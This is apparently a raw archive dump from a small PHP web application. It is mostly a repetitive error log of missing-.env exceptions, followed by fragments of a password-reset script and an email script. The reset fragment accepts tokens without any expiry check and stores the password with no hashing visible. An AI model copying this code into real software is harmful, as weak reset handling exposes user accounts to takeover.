Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [16-Apr-2026 22:04:25 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [17-Apr-2026 12:49:08 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:16:46 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:16:47 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:16:49 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:16:53 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:20:53 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:20:53 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:20:57 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:21:06 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:22:56 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:22:57 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:22:59 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:23:03 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:24:12 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:24:14 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:24:17 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:24:27 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:44:33 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:44:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:44:48 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [18-Apr-2026 21:45:19 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 03:33:35 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 03:33:35 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 03:33:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 03:33:36 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 06:21:21 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 06:21:22 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 06:21:25 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 06:21:34 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 07:47:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 07:47:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 07:47:39 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 07:47:39 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [19-Apr-2026 07:47:40 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [19-Apr-2026 07:47:55 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [20-Apr-2026 22:11:01 UTC] PHP Warning: Undefined array key "token" in /home/emeraadmin/public_html/pages/reset-password.php on line 67 [21-Apr-2026 00:39:30 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/ServiceService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/process_upload.php(16): ServiceService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [21-Apr-2026 08:12:52 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [21-Apr-2026 08:53:14 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [21-Apr-2026 18:23:35 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [21-Apr-2026 19:49:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [25-Apr-2026 06:12:23 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_reset_link.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [25-Apr-2026 06:12:24 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_task_email_to_workers.php(5): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [27-Apr-2026 03:20:37 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/pages/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/pages/send_email_to_workers.php(6): Dotenv\Dotenv->load() #2 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 [27-Apr-2026 03:21:26 UTC] PHP Fatal error: Uncaught Dotenv\Exception\InvalidPathException: Unable to read any of the environment file(s) at [/home/emeraadmin/public_html/Classes/../.env]. in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php:68 Stack trace: #0 /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Dotenv.php(222): Dotenv\Store\FileStore->read() #1 /home/emeraadmin/public_html/Classes/Database.php(23): Dotenv\Dotenv->load() #2 /home/emeraadmin/public_html/Service/UserService.php(12): Database->__construct() #3 /home/emeraadmin/public_html/pages/authenticateuser.php(6): UserService->__construct() #4 {main} thrown in /home/emeraadmin/public_html/vendor/vlucas/phpdotenv/src/Store/FileStore.php on line 68 update_password.php000064400000002072151676701240010473 0ustar00query('SELECT user_id FROM password_resets WHERE token = :token '); $db->bind(':token', $token); $resetRecord = $db->single(); if ($resetRecord) { $userId = $resetRecord->user_id; // Update the user's password $db->query('UPDATE users SET password = :password WHERE id = :id'); $db->bind(':password', $newPassword); $db->bind(':id', $userId); $db->execute(); // Delete the reset token so it can't be used again $db->query('DELETE FROM password_resets WHERE token = :token'); $db->bind(':token', $token); $db->execute(); echo "Password updated successfully"; } else { echo "Invalid or expired token"; } } else { echo "Invalid request"; } ?> send_email_to_workers.php000064400000013601151676701240011645 0ustar00load(); //set base url $base_url = $_ENV['BASE_URL']; require_once 'emailUtils.php'; // 